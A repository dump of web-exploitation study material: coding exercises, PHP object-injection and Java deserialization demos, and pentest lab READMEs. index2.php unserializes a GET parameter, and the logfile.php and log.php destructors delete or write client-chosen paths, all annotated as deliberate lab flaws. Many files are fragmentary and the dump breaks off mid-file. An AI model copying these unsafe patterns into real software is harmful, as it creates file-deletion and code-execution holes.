14 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/class-serialize.php:
--------------------------------------------------------------------------------
1 | name." is ".$this->age.
11 | " years old.";
12 | }
13 | }
14 |
15 | $user = new User();
16 |
17 | $user->age = 20;
18 | $user->name = "Milton";
19 |
20 | $user->PrintData();
21 |
22 | // serialize object and print output
23 | echo serialize($user)."\n";
24 |
25 | ?>
26 |
--------------------------------------------------------------------------------
/Edabit/php/forty-one.php:
--------------------------------------------------------------------------------
1 | r = $radius;
8 | }
9 | public function getArea()
10 | {
11 | return pi() * $this->r * $this->r;
12 | }
13 | public function getPerimeter()
14 | {
15 | return 2 * pi() * $this->r;
16 | }
17 | }
18 |
19 | $circ = new Circle(11);
20 | echo $circ->getArea()."\n";
21 |
22 | $circ = new Circle(4.44);
23 | echo $circ->getPerimeter()."\n";
24 |
25 | ?>
26 |
--------------------------------------------------------------------------------
/\dev\random: Pipe/weaponized_exploit/custom_class.php:
--------------------------------------------------------------------------------
1 | filename = '';
10 | $this->data = '';
11 | }
12 |
13 | public function PrintLog() // echoes "[LOG] - <timestamp> - <data>" with no trailing newline
14 | {
15 | $pre = "[LOG]";
16 | $now = date('Y-m-d H:i:s');
17 |
18 | $str = '$pre - $now - $this->data'; // single quotes: the variable names stay literal text at this point
19 | eval("\$str = \"$str\";"); // runs the fixed statement $str = "$pre - $now - $this->data"; the value of data is interpolated as a string, not parsed as code, so a plain double-quoted string would give the same result without eval
20 | echo $str; // NOTE(review): data is echoed unescaped; use htmlspecialchars() if this reaches a browser - TODO confirm output context
21 | }
22 | }
23 | ?>
24 |
--------------------------------------------------------------------------------
/Edabit/javascript/thirteen.js:
--------------------------------------------------------------------------------
/**
 * Report whether the string form of `num` reads the same forwards and
 * backwards.
 *
 * @param {*} num value whose toString() output is checked
 * @returns {boolean} true when the characters are mirror-symmetric
 */
function isSymmetrical(num) {
  const chars = num.toString().split("");
  const mirrored = chars.slice().reverse();

  // Comparing each position with its mirror is the same test as comparing
  // the reversed first half with the second half.
  return chars.every((ch, idx) => ch === mirrored[idx]);
}
15 |
--------------------------------------------------------------------------------
/Edabit/php/thirty-nine.php:
--------------------------------------------------------------------------------
1 |
22 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/logfile.php:
--------------------------------------------------------------------------------
1 | filename, $text, FILE_APPEND);
11 | }
12 | // destructor will delete the logfile
13 | public function __destruct() // PHP calls this when the object is destroyed, including objects created by unserialize()
14 | {
15 | echo "__destruct deletes (file): ".$this->filename."\n";
16 | unlink(dirname(__FILE__)."/".$this->filename); // NOTE(review): filename is used unchecked; "../" segments leave this directory, and an object built by unserialize() from client input carries a client-chosen filename - confine it with basename() or an allow-list
17 | }
18 | }
19 |
20 | ?>
21 |
--------------------------------------------------------------------------------
/Edabit/java/one.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an integer as an argument and returns
4 | "even" for even integers and "odd" for odd integers.
5 |
6 | Run using:
7 | java one.java
8 |
9 | */
10 |
public class Program
{
    /**
     * Classify an integer as even or odd.
     *
     * @param num the number to classify (negative values are handled too)
     * @return "even" when num is divisible by 2, otherwise "odd"
     */
    public static String isEvenOrOdd(int num)
    {
        if (num % 2 != 0)
            return "odd";
        return "even";
    }

    /** Print the classification of a sample value. */
    public static void main(String[] args)
    {
        final String label = isEvenOrOdd(3);
        System.out.printf("%s\n", label);
    }
}
24 |
--------------------------------------------------------------------------------
/Edabit/java/twenty-one.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that accepts a string (of a persons first and last name) and
4 | returns a string with the first and last name swapped.
5 |
6 | */
7 |
public class Program
{
    /**
     * Swap the first and last name in a "First Last" string.
     *
     * @param s two names separated by a single space
     * @return the names in the opposite order, joined by one space
     * @throws ArrayIndexOutOfBoundsException if s holds no space-separated second part
     */
    public static String nameShuffle(String s)
    {
        final String[] parts = s.split(" ");
        final String last = parts[1];
        final String first = parts[0];

        return last + " " + first;
    }

    public static void main(String[] args)
    {
        final String swapped = nameShuffle("Milton Valencia");
        System.out.printf("%s\n", swapped);
    }
}
22 |
--------------------------------------------------------------------------------
/Edabit/java/twenty-two.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes a string and returns a
4 | string with its letters in alphabetical order.
5 |
6 | */
7 |
8 | import java.util.Arrays;
9 |
public class Program
{
    /**
     * Return the characters of a string sorted in ascending order.
     *
     * @param s the text whose characters are sorted
     * @return a new string with the same characters in sorted order
     */
    public static String AlphabetSoup(String s)
    {
        final char[] letters = s.toCharArray();
        Arrays.sort(letters);
        return String.valueOf(letters);
    }

    public static void main(String[] args)
    {
        final String sorted = AlphabetSoup("hello");
        System.out.printf("%s\n", sorted);
    }
}
27 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Leveraging-JavaScript/task5-rm_field.js:
--------------------------------------------------------------------------------
1 |
10 |
--------------------------------------------------------------------------------
/Edabit/java/ten.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes a string and returns a
4 | string in which each character is repeated once.
5 |
6 | */
7 |
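public class Program
{
    /**
     * Return a string in which every character of the input appears twice.
     *
     * @param s the text to expand
     * @return the expanded text; an empty input gives an empty result
     */
    public static String doubleChar(String s)
    {
        String[] pieces = s.split("");
        // Build into one buffer; repeated String += copies the whole
        // result on every iteration.
        StringBuilder doubled = new StringBuilder(s.length() * 2);

        for (String piece : pieces)
            doubled.append(piece).append(piece);

        return doubled.toString();
    }

    public static void main(String[] args)
    {
        System.out.printf("%s\n", doubleChar("String"));
    }
}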
26 |
--------------------------------------------------------------------------------
/Edabit/php/twenty-five.php:
--------------------------------------------------------------------------------
1 |
27 |
--------------------------------------------------------------------------------
/Edabit/java/four.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Take an array of integers (positive or negative or both) and return
4 | the sum of the absolute value of each element.
5 |
6 | */
7 |
8 | import java.util.stream.*;
9 |
public class Program
{
    /**
     * Sum the absolute values of the elements of an array.
     *
     * @param nums the values to add up
     * @return the sum of |x| over all elements, 0 for an empty array
     */
    public static int getAbsSum(int[] nums)
    {
        return IntStream.of(nums).map(Math::abs).sum();
    }

    public static void main(String[] args)
    {
        final int[] sample = new int[]{2, -1, 4, 8, 10};
        System.out.printf("%d\n", getAbsSum(sample));
    }
}
25 |
--------------------------------------------------------------------------------
/Edabit/php/five.php:
--------------------------------------------------------------------------------
1 |
22 |
--------------------------------------------------------------------------------
/Edabit/java/nine.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a function that takes an array and a string as
4 | arguments and return the index of the string.
5 |
6 | */
7 |
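public class Program
{
    /**
     * Find the position of a string inside an array.
     *
     * Elements are compared by content. The previous "==" compared object
     * references, which only matched when both strings happened to be the
     * same interned literal.
     *
     * @param arr the array to search
     * @param str the string to look for (may be null)
     * @return the index of the first matching element, or arr.length when
     *         nothing matches
     */
    public static int findIndex(String[] arr, String str)
    {
        for (int i = 0; i < arr.length; i++)
            if (java.util.Objects.equals(arr[i], str))
                return i;
        // Not found: keep the original convention of returning arr.length.
        return arr.length;
    }

    public static void main(String[] args)
    {
        System.out.printf("%d\n",
            findIndex(new String[]{"hi", "edabit", "fgh", "abc"}, "fgh")
        );
    }
}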
26 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/index2.php:
--------------------------------------------------------------------------------
1 | filename);
10 | }
11 | }
12 |
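class User
{
    public $age = 0;
    public $name = '';

    // Magic method PHP calls when a User is used as a string (echo,
    // concatenation). The name must be spelled exactly __toString;
    // without it, echoing a User object is a fatal error.
    public function __toString()
    {
        return "User ".$this->name." is ".$this->age." years old.";
    }

    // Earlier, misspelled name; kept so explicit calls to it keep working.
    public function __to_String()
    {
        return $this->__toString();
    }
}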
23 |
24 | $obj = unserialize($_GET['usr']); // NOTE(review): unserialize() on a request parameter lets the client choose the class and property values of the resulting object (PHP Object Injection); outside a lab, parse the input with json_decode() or pass ['allowed_classes' => false]
25 | // any __destruct defined by the unserialized object's class runs when the object is destroyed, with those client-supplied properties
26 | echo $obj; // string conversion: calls the __toString method of the unserialized object's class, if it defines one
27 |
28 | ?>
29 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/XMLHttpRequests/task16-csrf_grab.js:
--------------------------------------------------------------------------------
1 |
13 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Parsing/task18-html_parsing.js:
--------------------------------------------------------------------------------
1 |
19 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Modifying-HTML/task3-redirect_input.js:
--------------------------------------------------------------------------------
1 |
19 |
--------------------------------------------------------------------------------
/Simple Object Oriented Language Examples/class-example.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | '''
4 |
5 | Author: wetw0rk
6 |
7 | Very simple example of object oriented programming in Python
8 |
9 | '''
10 |
class Picture():
    """Hold an id, a title and an image name, and print them on request."""

    def __init__(self, id, title, img):
        """Store the three values unchanged on the instance."""
        self.id, self.title, self.img = id, title, img

    def display_values(self):
        """Print the stored id, title and img on a single line."""
        fields = (self.id, self.title, self.img)
        print("id:%s, title:%s, img:%s" % fields)
23 |
# build one Picture and print its fields
example = Picture(id="1", title="wetw0rk", img="file.png")
example.display_values()
27 |
--------------------------------------------------------------------------------
/\dev\random: Pipe/log.php:
--------------------------------------------------------------------------------
1 | filename = '';
10 | $this->data = '';
11 | }
12 |
13 | public function PrintLog() // echoes "[LOG] - <timestamp> - <data>" with no trailing newline
14 | {
15 | $pre = "[LOG]";
16 | $now = date('Y-m-d H:i:s');
17 |
18 | $str = '$pre - $now - $this->data'; // single quotes: the variable names stay literal text at this point
19 | eval("\$str = \"$str\";"); // runs the fixed statement $str = "$pre - $now - $this->data"; the value of data is interpolated as a string, not parsed as code, so a plain double-quoted string would give the same result without eval
20 | echo $str; // NOTE(review): data is echoed unescaped; use htmlspecialchars() if this reaches a browser - TODO confirm output context
21 | }
22 |
23 | public function __destruct() // PHP calls this when the object is destroyed, including objects created by unserialize()
24 | {
25 | file_put_contents($this->filename, $this->data, FILE_APPEND); // NOTE(review): appends data to whatever path filename holds, with no check on either value; an instance built by unserialize() from client input gives the client both - restrict filename to a fixed log directory
26 | }
27 | }
28 | ?>
29 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/XMLHttpRequests/task13_xml_post.js:
--------------------------------------------------------------------------------
1 |
17 |
--------------------------------------------------------------------------------
/Simple Object Oriented Language Examples/class-example.js:
--------------------------------------------------------------------------------
1 |
33 |
--------------------------------------------------------------------------------
/Edabit/php/nineteen.php:
--------------------------------------------------------------------------------
1 |
26 |
--------------------------------------------------------------------------------
/Edabit/php/ten.php:
--------------------------------------------------------------------------------
1 |
23 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/XMLHttpRequests/task17-csrf_token_jack.js:
--------------------------------------------------------------------------------
1 |
19 |
--------------------------------------------------------------------------------
/Edabit/java/eleven.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | There is a single operator in Java capable of providing the remainder
4 | of a division operation. Two numbers are passed as parameters. The
5 | first parameter divided by the second parameter will have a remainder,
6 | possibly zero. Return that value.
7 |
8 | */
9 |
10 |
public class Program
{
    /**
     * Return the remainder of dividing a by b.
     *
     * @param a the dividend
     * @param b the divisor
     * @return a % b; the result takes the sign of a
     * @throws ArithmeticException if b is zero
     */
    public static int myMethod(int a, int b)
    {
        final int remainder = a % b;
        return remainder;
    }

    public static void main(String[] args)
    {
        final int[][] pairs = { {1, 3}, {-9, 45}, {5, 5} };
        for (int[] pair : pairs)
            System.out.printf("%d\n", myMethod(pair[0], pair[1]));
    }
}
25 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Modifying-HTML/task4-new_field.js:
--------------------------------------------------------------------------------
1 |
17 |
--------------------------------------------------------------------------------
/Edabit/java/seven.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an integer as its only argument
4 | and returns true if it's less than or equal to zero,
5 | otherwise return false.
6 |
7 | */
8 |
public class Program
{
    /**
     * Tell whether a number is zero or negative.
     *
     * @param num the value to test
     * @return true when num is less than or equal to zero
     */
    public static boolean lessThanOrEqualToZero(int num)
    {
        // The comparison already yields the boolean to return.
        return num <= 0;
    }

    public static void main(String[] args)
    {
        for (int sample : new int[]{5, 0, -2, 1})
            System.out.printf("%b\n", lessThanOrEqualToZero(sample));
    }
}
24 |
--------------------------------------------------------------------------------
/Edabit/java/thirty-four.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a function that takes an array of numbers and returns the mean value.
4 |
5 | */
6 |
7 | import java.util.*;
8 |
public class Program
{
    /**
     * Return the mean of an array of integers, rounded to two decimals.
     *
     * @param nums the values to average
     * @return the rounded mean; an empty array gives 0.0 because
     *         Math.round maps the NaN of 0/0 to 0
     */
    public static double mean(int[] nums)
    {
        double total = 0;
        for (int value : nums)
            total += value;

        final double average = total / nums.length;
        // Scale, round to the nearest whole number, scale back: two decimals.
        return Math.round(average * 100.0) / 100.0;
    }

    public static void main(String[] args)
    {
        final int[] sample = new int[]{1, 0, 4, 5, 2, 4, 1, 2, 3, 3, 3};
        System.out.printf("%s\n", mean(sample));
        System.out.printf("%s\n", mean(sample));
    }
}
27 |
--------------------------------------------------------------------------------
/Edabit/java/eighteen.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an integer as an argument. Add up all the numbers
4 | from 1 to the number you passed to the function. For example, if the input is
5 | 4 then your function should return 10 because 1 + 2 + 3 + 4 = 10.
6 |
7 | */
8 |
public class Program
{
    /**
     * Add up the numbers from 1 to num.
     *
     * The sum is built as num + (0 + 1 + ... + num-1), which equals
     * 1 + 2 + ... + num for positive input.
     *
     * @param num the upper bound
     * @return the sum; for zero or negative input the loop does not run
     *         and num itself is returned
     */
    public static int addUp(int num)
    {
        int total = num;
        int step = 0;
        while (step < num)
        {
            total += step;
            step++;
        }
        return total;
    }

    public static void main(String[] args)
    {
        for (int sample : new int[]{4, 13, 600})
            System.out.printf("%d\n", addUp(sample));
    }
}
26 |
--------------------------------------------------------------------------------
/Simple Object Oriented Language Examples/class-example.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Author: wetw0rk
4 |
5 | Very simple example of object oriented programming in Java
6 |
7 | */
8 |
public class Picture
{
    // Package-private fields, set once by the constructor.
    String id;
    String img;
    String title;

    /**
     * Create a picture record.
     *
     * @param id    identifier of the picture
     * @param title display title
     * @param img   image file name
     */
    public Picture(String id, String title, String img)
    {
        this.img = img;
        this.title = title;
        this.id = id;
    }

    /** Print id, title and img on one line. */
    void display_values()
    {
        final String layout = "id:%s, title:%s, img:%s\n";
        System.out.printf(layout, id, title, img);
    }

    public static void main(String[] args)
    {
        new Picture("1", "wetw0rk", "file.png").display_values();
    }
}
29 |
--------------------------------------------------------------------------------
/Simple Object Oriented Language Examples/class-example.php:
--------------------------------------------------------------------------------
1 | id = $id;
16 | $this->title = $title;
17 | $this->img = $img;
18 | }
19 | function display_values()
20 | {
21 | echo sprintf("id:%s, ", $this->id);
22 | echo sprintf("title:%s, ", $this->title);
23 | echo sprintf("img:%s\n", $this->img);
24 | }
25 | }
26 |
27 | // initialize and call
28 | $example = new Picture("1", "wetw0rk", "file.png");
29 | $example->display_values();
30 |
31 | ?>
32 |
--------------------------------------------------------------------------------
/Edabit/php/thirty-five.php:
--------------------------------------------------------------------------------
1 | = 1)
24 | {
25 | $res = str_ireplace($sausage[$i], "Wurst", $res);
26 | }
27 | }
28 | return $res;
29 | }
30 |
31 | echo wurstIsBetter("sausage fests are like Sausage fests")."\n";
32 |
33 |
34 | ?>
35 |
--------------------------------------------------------------------------------
/Edabit/README.md:
--------------------------------------------------------------------------------
1 | # Edabit
2 |
3 | The AWAE syllabus appears to include many real-world CVEs, meaning we will likely be doing source code review or chaining vulnerabilities in order to obtain code execution. Depending on the bug we may need to deploy custom payloads, so I decided to spend a week per language, specifically Java, JavaScript, and PHP. Since I know Python I decided to skip it; however, if you have little to no experience in Python I recommend spending a week on it as well.
4 |
5 | It's important you are able to do the following in each language:
6 | - Create a function
7 | - Call a function
8 | - Create a class
9 | - Call a class
10 | - Debug issues
11 |
12 | ## Links
13 |
14 | https://edabit.com/
15 |
--------------------------------------------------------------------------------
/Edabit/java/twenty-six.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | You will be implementing a basic case of the map-reduce pattern in programming.
4 | Given a vector stored as an array of numbers, find the magnitude of the vector.
5 | Use the standard distance formula for n-dimensional Cartesian coordinates.
6 |
7 | */
8 |
9 | import java.util.*;
10 |
public class Program
{
    /**
     * Return the Euclidean length of a vector.
     *
     * @param nums the vector's components
     * @return the square root of the sum of squared components,
     *         0.0 for an empty array
     */
    public static double magnitude(int[] nums)
    {
        double sumOfSquares = 0;

        for (int component : nums)
            sumOfSquares += Math.pow(component, 2);

        return Math.sqrt(sumOfSquares);
    }

    public static void main(String[] args)
    {
        final int[] sample = new int[]{3, 4};
        System.out.printf("%f\n", magnitude(sample));
    }
}
28 |
--------------------------------------------------------------------------------
/Edabit/php/thirty-four.php:
--------------------------------------------------------------------------------
1 | = 1 && substr_count($arr[1], ".com") == 1) { // len([0] >= 1 && ".com" in [1]
7 | $narr = explode('.', $arr[1]); // split aka n[0]=x, n[1]=com
8 | if (strlen($narr[0]) >= 1) // len(n[0]) >= 1
9 | return true; // return true
10 | }
11 | }
12 | return false;
13 | }
14 |
15 | echo "r: ";
16 | echo var_export(validateEmail("pen.tester@gmail.com"))."\n";
17 |
18 | ?>
19 |
--------------------------------------------------------------------------------
/From SQL Injection to Shell/README.md:
--------------------------------------------------------------------------------
1 | # From SQL Injection to Shell (NO SQLMAP ALLOWED)
2 |
3 | This exercise explains how you can, from a SQL injection, gain access to the administration console, then in the administration console, how you can run commands on the system.
4 |
5 | ## Personal Note
6 |
7 | It's important you fully understand where in the source code the vulnerability resides. Before or after exploitation, identify which function within the class is vulnerable, and why it reacts that way. How would you have gotten a shell with more privileges without the admin console?
8 |
9 | ## Links
10 | - https://pentesterlab.com/exercises/from_sqli_to_shell/course
11 | - https://pentesterlab.com/exercises/from_sqli_to_shell/iso
12 |
--------------------------------------------------------------------------------
/\dev\random: Pipe/README.md:
--------------------------------------------------------------------------------
1 | # /dev/random: Pipe
2 |
3 | This challenge involves the exploitation of a PHP Object Injection vulnerability (which is why it's on the list). Getting the initial shell is pretty straightforward, but the privilege escalation is a bit strange and, in my opinion, was harder.
4 |
5 | ## Personal Note
6 |
7 | Weaponize the exploit from scratch! You may encounter something like this during the course, and you need to be ready to craft an exploit. I wrote the exploit in PHP, however it can be written in any language. Feel free to look over my exploit if you get stuck although it should be straight forward. Good luck!
8 |
9 | ## Links
10 |
11 | - https://www.vulnhub.com/entry/devrandom-pipe,124/
12 | - https://download.vulnhub.com/devrandom/pipe.ova
13 |
--------------------------------------------------------------------------------
/Edabit/java/five.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an array of integers. Return the largest integer in the array.
4 |
5 | we could have also done:
6 |
7 | ```
8 | import static java.util.Arrays.stream;
9 |
10 | public static int findLargestNum(int[] nums) {
11 | return stream(nums).max().getAsInt();
12 | }
13 | ```
14 |
15 | */
16 |
public class Program
{
    /**
     * Return the largest value in an array of integers.
     *
     * @param nums the values to scan
     * @return the maximum element
     * @throws ArrayIndexOutOfBoundsException if the array is empty
     */
    public static int findLargestNum(int[] nums)
    {
        int best = nums[0];
        for (int candidate : nums)
            best = Math.max(best, candidate);
        return best;
    }

    public static void main(String[] args)
    {
        final int[] sample = new int[]{4,5,1,3};
        System.out.printf("%s\n", findLargestNum(sample));
    }
}
33 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/deser_example.java:
--------------------------------------------------------------------------------
1 | // run using: java
2 |
3 | import java.io.*;
4 |
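public class Userial
{
    /**
     * Read one serialized String from "file.bin" and print it.
     *
     * readObject() instantiates whatever serializable class the stream
     * names, before the (String) cast is checked, so the stream is given an
     * allow-list filter that accepts java.lang.String and rejects every
     * other class. The filter API needs Java 9 or later.
     */
    public static void main(String[] args)
    {
        String filename = "file.bin";

        // try-with-resources closes both streams even when reading fails.
        try (FileInputStream file = new FileInputStream(filename);
             ObjectInputStream in = new ObjectInputStream(file))
        {
            // Allow only String; "!*" rejects any other class in the stream.
            in.setObjectInputFilter(
                ObjectInputFilter.Config.createFilter("java.lang.String;!*")
            );

            // deserialization of the object (String)
            // will be written to STDOUT
            String name = (String) in.readObject();
            System.out.println(name);
        }
        catch (Exception e)
        {
            System.out.printf("Exception: %s\n", e.toString());
        }
    }
}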
31 |
--------------------------------------------------------------------------------
/Edabit/java/twelve.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an array of 10 integers (between 0 and 9)
4 | and returns a string of those numbers formatted as a phone number
5 | (e.g. (555) 555-5555).
6 |
7 | */
8 |
public class Program
{
    /**
     * Format digits as a phone number such as "(123) 456-7890".
     *
     * @param nums the digits, normally ten values between 0 and 9
     * @return "(" followed by the digits, with ") " inserted before the
     *         fourth digit and "-" before the seventh
     */
    public static String formatPhoneNumber(int[] nums)
    {
        final StringBuilder phone = new StringBuilder("(");

        for (int pos = 0; pos < nums.length; pos++)
        {
            switch (pos)
            {
                case 3:
                    phone.append(") ");
                    break;
                case 6:
                    phone.append('-');
                    break;
                default:
                    break;
            }
            phone.append(nums[pos]);
        }

        return phone.toString();
    }

    public static void main(String[] args)
    {
        final int[] digits = new int[]{1, 2, 3, 4, 5, 6, 7, 8, 9, 0};
        System.out.printf("%s\n", formatPhoneNumber(digits));
    }
}
32 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/ser_example.java:
--------------------------------------------------------------------------------
1 | // run using: java
2 |
3 | import java.io.*;
4 |
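public class Serial
{
    /**
     * Serialize the String "wetw0rk" into "file.bin".
     *
     * Any failure is reported on STDOUT as "Exception: ...".
     */
    public static void main(String[] args)
    {
        String name = "wetw0rk";
        String filename = "file.bin";

        // try-with-resources closes (and flushes) both streams even when
        // writeObject throws; the explicit close() calls were skipped then.
        try (FileOutputStream file = new FileOutputStream(filename);
             ObjectOutputStream out = new ObjectOutputStream(file))
        {
            // serialization of "name" (String) object
            // will be written to "file.bin"
            out.writeObject(name);
        }
        catch (Exception e)
        {
            System.out.printf("Exception: %s\n", e.toString());
        }
    }
}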
29 |
--------------------------------------------------------------------------------
/Edabit/java/twenty.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an array of integers and returns a new array,
4 | sorted in ascending order (smallest to biggest).
5 |
6 | - Sort integer array in ascending order.
7 | - If functions argument is an empty array, return an empty array.
8 | - Return new array of sorted integers.
9 |
10 | */
11 |
12 | import java.util.Arrays;
13 |
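public class Program
{
    /**
     * Return a new array holding the input values in ascending order.
     *
     * The input array is left untouched; sorting it in place and returning
     * the same reference would change the caller's data and would not be a
     * "new array" as the task asks.
     *
     * @param nums the values to sort; may be empty
     * @return a sorted copy, empty when the input is empty
     */
    public static int[] sortNumsAscending(int[] nums)
    {
        int[] sorted = Arrays.copyOf(nums, nums.length);
        Arrays.sort(sorted);
        return sorted;
    }

    public static void main(String[] args)
    {
        int[] arr1 = new int[]{1, 2, 10, 50, 5};
        int[] arr2 = new int[]{};

        System.out.println(Arrays.toString(sortNumsAscending(arr1)));
        System.out.println(Arrays.toString(sortNumsAscending(arr2)));
    }
}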
31 |
--------------------------------------------------------------------------------
/Edabit/java/twenty-three.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that alternates the case of the letters in a string.
4 |
5 | */
6 |
7 | import java.util.Arrays;
8 |
public class Program
{
    /**
     * Alternate the case of the characters in a string.
     *
     * @param s the text to transform
     * @return the text with characters at even positions upper-cased and
     *         characters at odd positions lower-cased
     */
    public static String alternatingCaps(String s)
    {
        final char[] letters = s.toCharArray();
        final StringBuilder result = new StringBuilder(letters.length);

        for (int pos = 0; pos < letters.length; pos++)
        {
            final boolean evenSlot = (pos % 2 == 0);
            result.append(evenSlot
                ? Character.toUpperCase(letters[pos])
                : Character.toLowerCase(letters[pos]));
        }

        return result.toString();
    }

    public static void main(String[] args)
    {
        final String[] samples = {
            "Hello",
            "HeY, hOw aRe yOu?",
            "OMG!!! This website is awesome!!"
        };
        for (String sample : samples)
            System.out.printf("%s\n", alternatingCaps(sample));
    }
}
32 |
--------------------------------------------------------------------------------
/Edabit/php/twenty-seven.php:
--------------------------------------------------------------------------------
1 |
34 |
--------------------------------------------------------------------------------
/Edabit/java/twenty-seven.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an array of strings. Return all words in the
4 | array that are exactly four letters.
5 |
6 | */
7 |
8 | import java.util.*;
9 |
public class Program
{
    /**
     * Return the words that are exactly four characters long.
     *
     * @param s the words to filter
     * @return a new array with the four-character words in their original order
     */
    public static String[] isFourLetters (String[] s)
    {
        return Arrays.stream(s)
                     .filter(word -> word.length() == 4)
                     .toArray(String[]::new);
    }

    public static void main(String[] args)
    {
        final String[] names = {"Ryan", "Kieran", "Jason", "Matt"};
        final String shown = Arrays.toString(isFourLetters(names));

        System.out.printf("%s\n", shown);
    }
}
37 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Parsing/task20-multi_level_json.js:
--------------------------------------------------------------------------------
1 |
26 |
--------------------------------------------------------------------------------
/Edabit/java/twenty-five.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a function that takes a string and returns the middle character(s).
4 | If the word's length is odd, return the middle character. If the word's
5 | length is even, return the middle two characters.
6 |
7 | */
8 |
9 | import java.util.*;
10 |
public class Program
{
    /**
     * Return the middle character(s) of a word.
     *
     * @param word the text to inspect
     * @return the single middle character for odd lengths, the two middle
     *         characters for even lengths
     * @throws ArrayIndexOutOfBoundsException if word is empty
     */
    public static String getMiddle(String word)
    {
        final char[] letters = word.toCharArray();
        final int centre = letters.length / 2;
        final boolean oddLength = (letters.length % 2 != 0);

        if (oddLength)
            return String.valueOf(letters[centre]);
        // The leading "" forces string concatenation rather than char arithmetic.
        return "" + letters[centre - 1] + letters[centre];
    }

    public static void main(String[] args)
    {
        for (String sample : new String[]{"test", "testing", "middle", "A"})
            System.out.printf("%s\n", getMiddle(sample));
    }
}
31 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/class-magic-examples.php:
--------------------------------------------------------------------------------
1 | variable."\n";
10 | }
11 | public function __construct() // constructor
12 | {
13 | echo "__construct\n";
14 | }
15 | public function __destruct() // destructor
16 | {
17 | echo "__destruct\n";
18 | }
19 | public function __toString()
20 | {
21 | return "__toString\n";
22 | }
23 | }
24 |
25 | $object = new TestClass(); // create an object, this will
26 | // call __construct
27 |
28 | $object->PrintVariable(); // call the method, this will
29 | // print "This is a string"
30 |
31 | echo $object; // object will act as a string
32 | // and will call __toString
33 |
34 | // end of PHP script, call __destruct
35 |
36 | ?>
37 |
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/README.md:
--------------------------------------------------------------------------------
1 | # Practicing Java Deserialization Exploits
2 |
3 | For this tutorial we will attempt the exploitation of a deserialization bug. It's pretty straightforward and also dives into the functionality of the payload. For the moment I opted out of creating the payload to focus on other exploitation methods, although I will be returning to the other links and learning payloads, particularly the blind-based payloads.
4 |
5 | ## Links
6 |
7 | - https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/
8 | - https://github.com/NickstaDB/DeserLab
9 | - https://github.com/NickstaDB/SerializationDumper
10 | - https://github.com/frohoff/jdeserialize/tree/master/jdeserialize
11 | - https://github.com/frohoff/ysoserial
12 |
13 | ## Other Links
14 |
15 | - https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
16 | - http://gursevkalra.blogspot.com/2016/01/ysoserial-commonscollections1-exploit.html
17 |
--------------------------------------------------------------------------------
/Edabit/java/seventeen.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a function that takes a string and returns the
4 | number (count) of vowels contained within it.
5 |
6 | */
7 |
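public class Program
{
    /**
     * Count how often {@code c} occurs in {@code str1}, comparing against the
     * lower-cased form of {@code str1}.
     *
     * @param str1 text to scan; must not be null
     * @param c    character to look for; pass it in lower case, because only
     *             the text is lower-cased, never {@code c}
     * @return number of positions in the lower-cased text equal to {@code c}
     */
    public static int matchesCount(String str1, char c)
    {
        // Lower-case once up front; doing it inside the loop copied the whole
        // string again for every character.
        String lowered = str1.toLowerCase();
        int count = 0;

        for (int i = 0; i < lowered.length(); i++)
            if (lowered.charAt(i) == c)
                count++;
        return count;
    }

    /**
     * Count the vowels (a, e, i, o, u in either case) contained in {@code str}.
     *
     * @param str text to scan; must not be null
     * @return total number of vowels
     */
    public static int getCount(String str)
    {
        char[] vowels = {'a', 'e', 'i', 'o', 'u'};
        int total = 0;

        for (char vowel : vowels)
            total += matchesCount(str, vowel);

        return total;
    }

    public static void main(String[] args)
    {
        System.out.printf("%d\n", getCount("Celebration"));
        System.out.printf("%d\n", getCount("Palm"));
        System.out.printf("%d\n", getCount("Prediction"));
    }
}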
38 |
--------------------------------------------------------------------------------
/Edabit/java/nineteen.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an array of integers and returns an array where
4 | each integer is the sum of itself + all previous numbers in the array.
5 |
6 | */
7 |
8 | import java.util.Arrays;
9 |
10 | public class Program
11 | {
12 | public static int[] cumulativeSum(int[] nums)
13 | {
14 | int[] arr = new int[nums.length];
15 | int j = 0;
16 |
17 | for (int i = 0; i < (nums.length); i++)
18 | {
19 | arr[i] = nums[i];
20 | while (j != i)
21 | arr[i] += nums[j++];
22 | j = 0;
23 | }
24 |
25 | return arr;
26 | }
27 |
28 | public static void main(String[] args)
29 | {
30 | int[] arr1 = new int[]{1, 2, 3};
31 | int[] arr2 = new int[]{1, -2, 3};
